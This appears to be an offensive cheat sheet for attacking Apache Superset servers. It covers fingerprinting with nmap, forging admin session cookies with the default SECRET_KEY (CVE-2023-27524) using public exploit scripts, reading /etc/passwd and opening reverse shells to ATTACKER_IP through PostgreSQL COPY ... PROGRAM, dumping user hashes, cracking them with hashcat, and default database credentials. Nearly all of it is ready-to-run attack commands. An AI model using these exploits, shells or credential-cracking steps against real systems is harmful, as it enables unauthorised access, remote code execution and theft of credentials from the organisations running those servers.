Data visualization and BI platform. Often runs on Werkzeug/Python.
Default Port: 8088
# Nmap
nmap -sV -p 8088 TARGET
# Indicators
# - Server header: Werkzeug/x.x.x Python/x.x.x
# - Title: "Superset"
# - Redirect to /login/
# - Endpoints: /health, /ping, /healthcheckCommon Endpoints:
/login/
/superset/welcome/
/superset/sqllab/
/superset/explore/
/health
/ping
/healthcheck
Affects: Apache Superset < 2.1.0
Superset uses Flask session cookies signed with a SECRET_KEY. Many instances use the default key, allowing attackers to forge admin session cookies.
b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h'
git clone https://github.com/horizon3ai/CVE-2023-27524.git
cd CVE-2023-27524
python3 CVE-2023-27524.py --url http://TARGET:8088Output:
Superset Version: 1.4.0
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0...
git clone https://github.com/jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE.git
cd CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE
# Enumerate databases
python3 exploit.py -u http://TARGET:8088 --enum-dbs
# Attempt reverse shell
python3 exploit.py -u http://TARGET:8088 --revshell ATTACKER_IP:PORTUse the forged cookie in browser:
- Open DevTools → Application → Cookies
- Replace
sessioncookie value with forged cookie - Refresh page → Logged in as admin
Once authenticated, access SQL Lab at /superset/sqllab/
Read Local Files:
CREATE TABLE read_files(output text);
COPY read_files FROM '/etc/passwd';
SELECT * FROM read_files;Reverse Shell:
CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f';Alternative RCE:
COPY (SELECT '') TO PROGRAM 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"';/home/*/superset/docker/.env # Docker environment
/home/*/.superset/superset.db # SQLite database with user hashes
/app/superset_config.py # Main config
# SQLite database location
/home/tom/.superset/superset.db
# Query for users
sqlite3 superset.db "SELECT username, password FROM ab_user;"Hash Format (PBKDF2-SHA256):
pbkdf2:sha256:150000$wp3NugwQ$7e09694d2b07c70a67b7817dee361e8e06191f50f04163c37aa01bea24ec94f1
Convert to hashcat format:
pbkdf2:sha256:150000$SALT$HASH
→
sha256:150000:SALT:HASH
# Hashcat mode 10900 (PBKDF2-HMAC-SHA256)
hashcat -m 10900 -a 0 'sha256:150000:wp3NugwQ:7e09694d2b07c70a67b7817dee361e8e06191f50f04163c37aa01bea24ec94f1' /usr/share/wordlists/rockyou.txtIf you have access to SQL Lab, database credentials are visible in the connection settings or can be extracted:
-- In SQL Lab, check connection string
-- Usually format: postgresql+psycopg2://USER:PASS@HOST:PORT/DBNAMECommon default connection:
Host: 127.0.0.1:5432
User: dbuser / superset
Pass: dbpass / superset
DB: employees / superset